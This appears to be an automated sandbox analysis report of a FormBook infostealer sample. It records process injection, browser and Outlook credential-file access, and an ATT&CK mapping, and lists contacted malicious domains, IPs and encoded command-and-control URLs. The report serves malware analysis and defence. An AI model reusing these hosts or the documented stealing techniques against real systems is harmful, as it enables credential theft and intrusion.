        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CA580 mov eax, dword ptr fs:[00000030h]19_2_037CA580
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C9580 mov eax, dword ptr fs:[00000030h]19_2_037C9580
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C9580 mov eax, dword ptr fs:[00000030h]19_2_037C9580
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03798470 mov eax, dword ptr fs:[00000030h]19_2_03798470
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03798470 mov eax, dword ptr fs:[00000030h]19_2_03798470

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Injects a PE file into a foreign processes
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF73BDD0000 value starts with: 4D5AJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: unknown target: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: unknown target: C:\Windows\SysWOW64\SearchProtocolHost.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: unknown target: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: unknown target: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF73BDD0000Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\Desktop\hesaphareketi-01.exe C:\Users\user\Desktop\hesaphareketi-01.exeJump to behavior
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe C:\Windows\SysWOW64\SearchProtocolHost.exeJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
        Valid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		11
        Masquerading        		1
        OS Credential Dumping        		2
        Security Software Discovery        		Remote Services1
        Email Collection        		Exfiltration Over Other Network Medium11
        Encrypted Channel        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
        System Shutdown/Reboot        		Acquire InfrastructureGather Victim Identity Information
        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		Exfiltration Over Bluetooth4
        Ingress Tool Transfer        		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
        Domain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		1
        Access Token Manipulation        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		Automated Exfiltration4
        Non-Application Layer Protocol        		Data Encrypted for ImpactDNS ServerEmail Addresses
        Local AccountsCronLogin HookLogin Hook311
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		Traffic Duplication5
        Application Layer Protocol        		Data DestructionVirtual Private ServerEmployee Names
        Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets2
        File and Directory Discovery        		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
        Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
        Obfuscated Files or Information        		Cached Domain Credentials4
        System Information Discovery        		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
        External Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1353023 Sample: hesaphareketi-01.exe Startdate: 04/12/2023 Architecture: WINDOWS Score: 100 35 www.tunug.xyz 2->35 37 www.spark-tech-global.xyz 2->37 39 24 other IPs or domains 2->39 45 Multi AV Scanner detection for domain / URL 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 53 3 other signatures 2->53 10 hesaphareketi-01.exe 16 59 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 37->51 process4 file5 25 C:\Users\user\AppData\Local\...\System.dll, PE32 10->25 dropped 27 C:\Users\user\AppData\Local\...\LangDLL.dll, PE32 10->27 dropped 13 hesaphareketi-01.exe 6 10->13         started        process6 dnsIp7 41 drive.google.com 142.250.65.174, 443, 49744 GOOGLEUS United States 13->41 43 googlehosted.l.googleusercontent.com 142.251.40.129, 443, 49748 GOOGLEUS United States 13->43 63 Maps a DLL or memory area into another process 13->63 17 iyGEtqCQDnvMouCuszv.exe 13->17 injected signatures8 process9 dnsIp10 29 www.foodpackaging-jobs07.xyz 64.190.62.22, 49754, 49755, 49756 NBS11696US United States 17->29 31 tunug.xyz 31.186.11.254, 49799, 49800, 49801 BETAINTERNATIONALTR Turkey 17->31 33 13 other IPs or domains 17->33 20 SearchProtocolHost.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Writes to foreign memory regions 20->59 61 2 other signatures 20->61 23 firefox.exe 20->23         started        process13

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        hesaphareketi-01.exe18%VirustotalBrowse
        hesaphareketi-01.exe6%ReversingLabs

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsj313A.tmp\LangDLL.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        www.dabblefurnishings.space8%VirustotalBrowse
        www.tubidy.tech2%VirustotalBrowse
        www.resolution-pj.com1%VirustotalBrowse
        projectmerdeka.com0%VirustotalBrowse
        www.spark-tech-global.xyz3%VirustotalBrowse
        www.infinite-7.com0%VirustotalBrowse
        www.ayotundewrites.com1%VirustotalBrowse
        ayotundewrites.com1%VirustotalBrowse
        rocsys.net0%VirustotalBrowse
        www.luciengeorge.com0%VirustotalBrowse
        www.projectmerdeka.com0%VirustotalBrowse
        www.rocsys.net1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.atlasmisc.org/uaaq/?XFs82=6R5Xx6907&9pG0L=FvUhDsBmpCJoj3lGkDh7rJRDQZ/xWYuOs9BV8EopI6SMYb/NSZXNOV1HCqXbeEBh5mla6CDOuwUwzd7BjgPBM1LiYO3UkBsWTw==0%Avira URL Cloudsafe
        http://www.rocsys.net/uaaq/?XFs82=6R5Xx6907&9pG0L=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA==0%Avira URL Cloudsafe
        http://www.mariannaserocka.com/uaaq/?9pG0L=H11jHdK8tiQEdc8HiBJGcTnPn4JeKO7dY7p2R0AEMYCSTpUW3HGmQSiGfhMiAqlsALoBPlIqyHCk3n5D4MLz3+EHJa2hwQp0yQ==&XFs82=6R5Xx69070%Avira URL Cloudsafe
        http://www.viough.com/uaaq/0%Avira URL Cloudsafe
        http://www.luciengeorge.com/uaaq/0%Avira URL Cloudsafe
        http://www.tubidy.tech/uaaq/0%Avira URL Cloudsafe
        http://www.mariannaserocka.com/uaaq/0%Avira URL Cloudsafe
        http://www.atlasmisc.org/uaaq/0%Avira URL Cloudsafe
        http://www.viough.com/uaaq/?XFs82=6R5Xx6907&9pG0L=mPcoyCc3cvVI56HjA/xjRVjOd7rNkjWE/WSPp3YblL8zBWhOEeaQXn4Q6MGv1focxns6TnusPsnXCCahRqcYb38qMNH6MpLfYA==0%Avira URL Cloudsafe
        http://www.resolution-pj.com/uaaq/?9pG0L=77nPASVBGS1VUo/R/j6d44mDwP+QIahx3JuWX6aukgDTtShzh3giMrfi3qntC2nVHjeoyaY8HDsr1L/VBT/etq3vOO5xT7Atwg==&XFs82=6R5Xx69070%Avira URL Cloudsafe
        http://www.dabblefurnishings.space/uaaq/100%Avira URL Cloudmalware
        http://www.resolution-pj.com/uaaq/0%Avira URL Cloudsafe
        http://www.spark-tech-global.xyz/uaaq/0%Avira URL Cloudsafe
        http://www.foodpackaging-jobs07.xyz/uaaq/100%Avira URL Cloudmalware
        http://www.ayotundewrites.com/uaaq/0%Avira URL Cloudsafe
        http://www.tunug.xyz/uaaq/0%Avira URL Cloudsafe
        http://www.projectmerdeka.com/uaaq/0%Avira URL Cloudsafe
        http://www.infinite-7.com/uaaq/?XFs82=6R5Xx6907&9pG0L=mMAtnDth0zIbmmwbJQD8SlCQVGGtkMLB+9yssOEsh1d4l9lYjNEmW7ArbhIk2T6dCq7f547m+Me71T0/Rw5JLcbntfWt6c4bbw==100%Avira URL Cloudmalware
        http://www.foodpackaging-jobs07.xyz/uaaq/?9pG0L=ed3a/Sv+YSNt0BMMWtDh8oRuTPUbBqji39M76aoz6xorlqt/FJu/vPF07bZH/KR6fDXWAwgG8DEezwMWX4bfyuM0xYlQJ9cJ0w==&XFs82=6R5Xx6907100%Avira URL Cloudmalware
        http://www.spark-tech-global.xyz/uaaq/?XFs82=6R5Xx6907&9pG0L=uqX2CpJoJvwTFA+ZFtoTb/Viquue5JaT7gdpcN3qNHbjP1Cd4gItxtd6vZy9N0V5BOWbrcI9A+ppibdEzCLbbhznzUeV+CWA9w==0%Avira URL Cloudsafe
        http://www.projectmerdeka.com/uaaq/?9pG0L=uIq56BIwEgOtiyQr6743FVEUWeewfIvBTD+QAd7G5aNLRXmwRIDTY8coJ7Y84KRozcEAIYfXjUIHNLCJhW9aa5jrQ6gGBb360w==&XFs82=6R5Xx69070%Avira URL Cloudsafe
        http://www.popup-shops.us/uaaq/0%Avira URL Cloudsafe
        http://www.tunug.xyz/uaaq/?9pG0L=c+6TcgwS74LYb/BtPGzNqx0v24f4gkgpuEv8j4KmZe3KWMq5Vv4U79mpWhSZrgbcOhaTjzTbW4/9rezZQ6Dag7ZY/b6dvvuFMQ==&XFs82=6R5Xx69070%Avira URL Cloudsafe
        http://www.infinite-7.com/uaaq/100%Avira URL Cloudmalware
        http://www.tubidy.tech/uaaq/?9pG0L=+fLke0FkZ8ddpf91rSuK7zl5QINwJbdABoU0VkbbyogRs1jBfiuiWgTdT60Kd54wcvqO12MKWygzxtqc9m8Iy6fCV4+OuKKc/Q==&XFs82=6R5Xx69070%Avira URL Cloudsafe
        http://www.luciengeorge.com/uaaq/?9pG0L=fmH9yz//bCxvzW52vWt98M+uaVtRGNwHjsHeAa3s9TBNvVrXrI6jb3VoW2ynR6RQyk2x+GY+m0JVnac7FabBN9cfOPAzgTn6pg==&XFs82=6R5Xx69070%Avira URL Cloudsafe
        http://www.rocsys.net/uaaq/0%Avira URL Cloudsafe
        http://www.ayotundewrites.com/uaaq/?9pG0L=EGijkzvOzpvUykTSqEH5xYloxulInJA6Yfy3UgRPmiIu9LDG8q5Bov6ZnoBY4U7UUr/swV4XyGGNsY5GmvOqPiqhu9t92ITdQQ==&XFs82=6R5Xx69070%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.dabblefurnishings.space
        		66.96.162.139
        		truefalseunknown
        www.tubidy.tech
        		146.148.34.125
        		truefalseunknown
        www.viough.com
        		163.197.216.134
        		truefalse
          		unknown
          www.resolution-pj.com
          		133.130.64.24
          		truefalseunknown
          parkingpage.namecheap.com
          		91.195.240.19
          		truefalse
            		high
            www.mariannaserocka.com
            		65.108.122.245
            		truefalse
              		unknown
              tunug.xyz
              		31.186.11.254
              		truetrue
                		unknown
                www.90dayleaderlab.com
                		66.96.162.142
                		truefalse
                  		unknown
                  ayotundewrites.com
                  		83.229.19.76
                  		truefalseunknown
                  www.foodpackaging-jobs07.xyz
                  		64.190.62.22
                  		truetrue
                    		unknown
                    rocsys.net
                    		37.97.254.27
                    		truefalseunknown
                    www.atlasmisc.org
                    		91.195.240.117
                    		truefalse
                      		unknown
                      projectmerdeka.com
                      		203.175.9.19
                      		truefalseunknown
                      www.spark-tech-global.xyz
                      		162.0.222.119
                      		truetrueunknown
                      drive.google.com
                      		142.250.65.174
                      		truefalse
                        		high
                        googlehosted.l.googleusercontent.com
                        		142.251.40.129
                        		truefalse
                          		high
                          skeletal-caterpillar-5caa8z0zckv31hwhum7ccarw.herokudns.com
                          		54.73.26.109
                          		truefalse
                            		unknown
                            www.ayotundewrites.com
                            		unknown
                            		unknowntrueunknown
                            www.infinite-7.com
                            		unknown
                            		unknowntrueunknown
                            www.realadvertisements.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.tunug.xyz
                              		unknown
                              		unknowntrue
                                		unknown
                                www.luciengeorge.com
                                		unknown
                                		unknowntrueunknown
                                www.projectmerdeka.com
                                		unknown
                                		unknowntrueunknown
                                doc-0g-ag-docs.googleusercontent.com
                                		unknown
                                		unknownfalse
                                  		high
                                  www.rocsys.net
                                  		unknown
                                  		unknowntrueunknown
                                  www.popup-shops.us
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.rocsys.net/uaaq/?XFs82=6R5Xx6907&9pG0L=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA==false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://doc-0g-ag-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/afsc4ag5uqa5maj4frjtgk9skbeu3peo/1701687750000/14166578405435855174/*/1ZIshcel7UMzwz8rXT4KX5lfic62QjZtZ?e=download&uuid=e13d7ba5-3bd0-48f6-b701-0767cd5a3c67false
                                      		high
                                      http://www.luciengeorge.com/uaaq/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.atlasmisc.org/uaaq/?XFs82=6R5Xx6907&9pG0L=FvUhDsBmpCJoj3lGkDh7rJRDQZ/xWYuOs9BV8EopI6SMYb/NSZXNOV1HCqXbeEBh5mla6CDOuwUwzd7BjgPBM1LiYO3UkBsWTw==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.mariannaserocka.com/uaaq/?9pG0L=H11jHdK8tiQEdc8HiBJGcTnPn4JeKO7dY7p2R0AEMYCSTpUW3HGmQSiGfhMiAqlsALoBPlIqyHCk3n5D4MLz3+EHJa2hwQp0yQ==&XFs82=6R5Xx6907false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.viough.com/uaaq/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.tubidy.tech/uaaq/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.mariannaserocka.com/uaaq/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.resolution-pj.com/uaaq/?9pG0L=77nPASVBGS1VUo/R/j6d44mDwP+QIahx3JuWX6aukgDTtShzh3giMrfi3qntC2nVHjeoyaY8HDsr1L/VBT/etq3vOO5xT7Atwg==&XFs82=6R5Xx6907false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.atlasmisc.org/uaaq/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.viough.com/uaaq/?XFs82=6R5Xx6907&9pG0L=mPcoyCc3cvVI56HjA/xjRVjOd7rNkjWE/WSPp3YblL8zBWhOEeaQXn4Q6MGv1focxns6TnusPsnXCCahRqcYb38qMNH6MpLfYA==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.dabblefurnishings.space/uaaq/false
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.resolution-pj.com/uaaq/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.spark-tech-global.xyz/uaaq/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.foodpackaging-jobs07.xyz/uaaq/false
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.ayotundewrites.com/uaaq/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.tunug.xyz/uaaq/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.projectmerdeka.com/uaaq/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.infinite-7.com/uaaq/?XFs82=6R5Xx6907&9pG0L=mMAtnDth0zIbmmwbJQD8SlCQVGGtkMLB+9yssOEsh1d4l9lYjNEmW7ArbhIk2T6dCq7f547m+Me71T0/Rw5JLcbntfWt6c4bbw==false
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.foodpackaging-jobs07.xyz/uaaq/?9pG0L=ed3a/Sv+YSNt0BMMWtDh8oRuTPUbBqji39M76aoz6xorlqt/FJu/vPF07bZH/KR6fDXWAwgG8DEezwMWX4bfyuM0xYlQJ9cJ0w==&XFs82=6R5Xx6907false
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.spark-tech-global.xyz/uaaq/?XFs82=6R5Xx6907&9pG0L=uqX2CpJoJvwTFA+ZFtoTb/Viquue5JaT7gdpcN3qNHbjP1Cd4gItxtd6vZy9N0V5BOWbrcI9A+ppibdEzCLbbhznzUeV+CWA9w==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.projectmerdeka.com/uaaq/?9pG0L=uIq56BIwEgOtiyQr6743FVEUWeewfIvBTD+QAd7G5aNLRXmwRIDTY8coJ7Y84KRozcEAIYfXjUIHNLCJhW9aa5jrQ6gGBb360w==&XFs82=6R5Xx6907false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.popup-shops.us/uaaq/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.tunug.xyz/uaaq/?9pG0L=c+6TcgwS74LYb/BtPGzNqx0v24f4gkgpuEv8j4KmZe3KWMq5Vv4U79mpWhSZrgbcOhaTjzTbW4/9rezZQ6Dag7ZY/b6dvvuFMQ==&XFs82=6R5Xx6907false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.infinite-7.com/uaaq/false
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.tubidy.tech/uaaq/?9pG0L=+fLke0FkZ8ddpf91rSuK7zl5QINwJbdABoU0VkbbyogRs1jBfiuiWgTdT60Kd54wcvqO12MKWygzxtqc9m8Iy6fCV4+OuKKc/Q==&XFs82=6R5Xx6907false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.luciengeorge.com/uaaq/?9pG0L=fmH9yz//bCxvzW52vWt98M+uaVtRGNwHjsHeAa3s9TBNvVrXrI6jb3VoW2ynR6RQyk2x+GY+m0JVnac7FabBN9cfOPAzgTn6pg==&XFs82=6R5Xx6907false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.rocsys.net/uaaq/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.ayotundewrites.com/uaaq/?9pG0L=EGijkzvOzpvUykTSqEH5xYloxulInJA6Yfy3UgRPmiIu9LDG8q5Bov6ZnoBY4U7UUr/swV4XyGGNsY5GmvOqPiqhu9t92ITdQQ==&XFs82=6R5Xx6907false
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://doc-0g-ag-docs.googleusercontent.com/%%doc-0g-ag-docs.googleusercontent.comhesaphareketi-01.exe, 00000009.00000003.1273738509.000000000729D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://doc-0g-ag-docs.googleusercontent.com/hesaphareketi-01.exe, 00000009.00000003.1273738509.000000000729D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://nsis.sf.net/NSIS_ErrorErrorhesaphareketi-01.exe, 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp, hesaphareketi-01.exe, 00000000.00000000.689469037.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                            		high
                                            http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDhesaphareketi-01.exe, 00000009.00000001.1145004026.0000000000626000.00000020.00000001.01000000.00000007.sdmpfalse
                                              		high
                                              https://doc-0g-ag-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/afsc4ag5hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.comhesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://apis.google.comhesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    37.97.254.27
                                                    		rocsys.netNetherlands
                                                    		20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse
                                                    142.250.65.174
                                                    		drive.google.comUnited States
                                                    		15169GOOGLEUSfalse
                                                    163.197.216.134
                                                    		www.viough.comSouth Africa
                                                    		54600PEGTECHINCUSfalse
                                                    142.251.40.129
                                                    		googlehosted.l.googleusercontent.comUnited States
                                                    		15169GOOGLEUSfalse
                                                    66.96.162.142
                                                    		www.90dayleaderlab.comUnited States
                                                    		29873BIZLAND-SDUSfalse
                                                    64.190.62.22
                                                    		www.foodpackaging-jobs07.xyzUnited States
                                                    		11696NBS11696UStrue
                                                    146.148.34.125
                                                    		www.tubidy.techUnited States
                                                    		15169GOOGLEUSfalse
                                                    162.0.222.119
                                                    		www.spark-tech-global.xyzCanada
                                                    		35893ACPCAtrue
                                                    91.195.240.19
                                                    		parkingpage.namecheap.comGermany
                                                    		47846SEDO-ASDEfalse
                                                    54.73.26.109
                                                    		skeletal-caterpillar-5caa8z0zckv31hwhum7ccarw.herokudns.comUnited States
                                                    		16509AMAZON-02USfalse
                                                    31.186.11.254
                                                    		tunug.xyzTurkey
                                                    		199484BETAINTERNATIONALTRtrue
                                                    91.195.240.117
                                                    		www.atlasmisc.orgGermany
                                                    		47846SEDO-ASDEfalse
                                                    203.175.9.19
                                                    		projectmerdeka.comIndonesia
                                                    		131303FCCDCI-NET-PH4FPodiumRCBCPlazaTowerIPHfalse
                                                    66.96.162.139
                                                    		www.dabblefurnishings.spaceUnited States
                                                    		29873BIZLAND-SDUSfalse
                                                    83.229.19.76
                                                    		ayotundewrites.comUnited Kingdom
                                                    		8513SKYVISIONGBfalse
                                                    65.108.122.245
                                                    		www.mariannaserocka.comUnited States
                                                    		11022ALABANZA-BALTUSfalse
                                                    133.130.64.24
                                                    		www.resolution-pj.comJapan7506INTERQGMOInternetIncJPfalse

                                                    General Information

                                                    Joe Sandbox version:38.0.0 Ammolite
                                                    Analysis ID:1353023
                                                    Start date and time:2023-12-04 11:58:36 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 20m 1s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                    Run name:Suspected Instruction Hammering
                                                    Number of analysed new started processes analysed:26
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:hesaphareketi-01.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/11@19/17
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
